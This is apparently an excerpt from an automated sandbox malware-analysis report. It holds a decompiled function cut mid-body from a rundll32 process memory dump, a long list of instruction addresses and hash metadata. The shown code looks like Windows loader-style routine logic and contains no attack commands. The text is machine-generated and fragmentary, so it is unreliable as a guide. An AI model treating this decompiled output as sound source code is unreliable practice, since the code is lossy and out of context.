						_t152 = E04685A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E046804C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x47565e0; // 0x76d8a680
							 *0x47591e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x47565e8;
									if(_t148 != 0) {
										 *0x47591e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E0467DC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E04673B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E04679870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E046C247B();
									goto L26;
								} else {
									_t152 = E0467A170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E046804C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}















                                                                                                                              0x04669046
                                                                                                                              0x04669046
                                                                                                                              0x0466904b
                                                                                                                              0x04669050
                                                                                                                              0x04669055
                                                                                                                              0x0466905b
                                                                                                                              0x0466905d
                                                                                                                              0x04669066
                                                                                                                              0x0466906f
                                                                                                                              0x04669078
                                                                                                                              0x04669080
                                                                                                                              0x04669088
                                                                                                                              0x0466908f
                                                                                                                              0x04669095
                                                                                                                              0x046690a9
                                                                                                                              0x046690b1
                                                                                                                              0x046690be
                                                                                                                              0x046690c6
                                                                                                                              0x046690cf
                                                                                                                              0x046690e2
                                                                                                                              0x046690f7
                                                                                                                              0x046690fb
                                                                                                                              0x04669118
                                                                                                                              0x00000000
                                                                                                                              0x04669123
                                                                                                                              0x0466913b
                                                                                                                              0x0466913f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x04669147
                                                                                                                              0x046c231f
                                                                                                                              0x046c231f
                                                                                                                              0x00000000
                                                                                                                              0x046c231f
                                                                                                                              0x04669154
                                                                                                                              0x046c2330
                                                                                                                              0x046c2336
                                                                                                                              0x046c2336
                                                                                                                              0x0466915a
                                                                                                                              0x0466915a
                                                                                                                              0x0466915a
                                                                                                                              0x04669161
                                                                                                                              0x04669167
                                                                                                                              0x0466916b
                                                                                                                              0x04669172
                                                                                                                              0x04669182
                                                                                                                              0x0466918e
                                                                                                                              0x04669199
                                                                                                                              0x046691ba
                                                                                                                              0x046691be
                                                                                                                              0x00000000
                                                                                                                              0x046691e0
                                                                                                                              0x046c2358
                                                                                                                              0x046c2360
                                                                                                                              0x046c2368
                                                                                                                              0x046c236a
                                                                                                                              0x046c2372
                                                                                                                              0x00000000
                                                                                                                              0x046c2378
                                                                                                                              0x046c2378
                                                                                                                              0x046c2381
                                                                                                                              0x046c2458
                                                                                                                              0x046c2458
                                                                                                                              0x046c245b
                                                                                                                              0x046c2463
                                                                                                                              0x046c2468
                                                                                                                              0x046c246e
                                                                                                                              0x046c246e
                                                                                                                              0x046c24a7
                                                                                                                              0x00000000
                                                                                                                              0x046c24a7
                                                                                                                              0x046c238f
                                                                                                                              0x046c2396
                                                                                                                              0x046c239c
                                                                                                                              0x046c239f
                                                                                                                              0x046c239f
                                                                                                                              0x046c23bb
                                                                                                                              0x046c23c8
                                                                                                                              0x046c23ca
                                                                                                                              0x046c23d2
                                                                                                                              0x046c244c
                                                                                                                              0x046c244c
                                                                                                                              0x046c2453
                                                                                                                              0x00000000
                                                                                                                              0x046c23d4
                                                                                                                              0x046c23e7
                                                                                                                              0x046c23e9
                                                                                                                              0x046c23f1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x046c23f9
                                                                                                                              0x046c2402
                                                                                                                              0x046c2408
                                                                                                                              0x046c240c
                                                                                                                              0x046c2413
                                                                                                                              0x046c2423
                                                                                                                              0x046c243f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x046c2441
                                                                                                                              0x046c2446
                                                                                                                              0x046c2446
                                                                                                                              0x00000000
                                                                                                                              0x046c2446
                                                                                                                              0x046c23fb
                                                                                                                              0x00000000
                                                                                                                              0x046c23fb
                                                                                                                              0x046c23d2
                                                                                                                              0x00000000
                                                                                                                              0x046c2372
                                                                                                                              0x046691be
                                                                                                                              0x04669118
                                                                                                                              0x046690fd
                                                                                                                              0x04669102
                                                                                                                              0x0466910e

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.46598506537.0000000004759000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_4630000_rundll32.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $$@
                                                                                                                              • API String ID: 0-1194432280
                                                                                                                              • Opcode ID: 30ef4bd58f59508c4e16516776cd4b8db6d96d6c5e8df0be70de9ba950b3af8d
                                                                                                                              • Instruction ID: 57e60851c29ff0ae9fb0189e725e60c7eaf85d89c49b22b859634bc618ece43e
                                                                                                                              • Opcode Fuzzy Hash: 30ef4bd58f59508c4e16516776cd4b8db6d96d6c5e8df0be70de9ba950b3af8d
                                                                                                                              • Instruction Fuzzy Hash: 65811CB1D002699BDB31DF54CC44BEEB7B8AB44714F0081EAE90AB7250E7706E85CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%